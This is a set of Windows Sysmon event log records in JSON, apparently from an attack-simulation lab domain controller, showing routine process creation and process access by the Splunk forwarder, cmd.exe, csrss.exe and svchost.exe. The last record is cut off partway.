{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3221,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.846\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nProcessId: 4400\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-0010815A0500}\r\nParentProcessId: 4416\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.846","ProcessGuid":"{41C8662E-1FF3-5F25-0000-0010435B0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-0010815A0500}","ParentProcessId":"4416","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3222,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010815A0500}\r\nSourceProcessId: 4416\r\nSourceThreadId: 4428\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010815A0500}","SourceProcessId":"4416","SourceThreadId":"4428","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","TargetProcessId":"4400","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3223,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010435B0500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010435B0500}","TargetProcessId":"4400","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3224,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3225,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3226,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3227,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3228,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3229,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 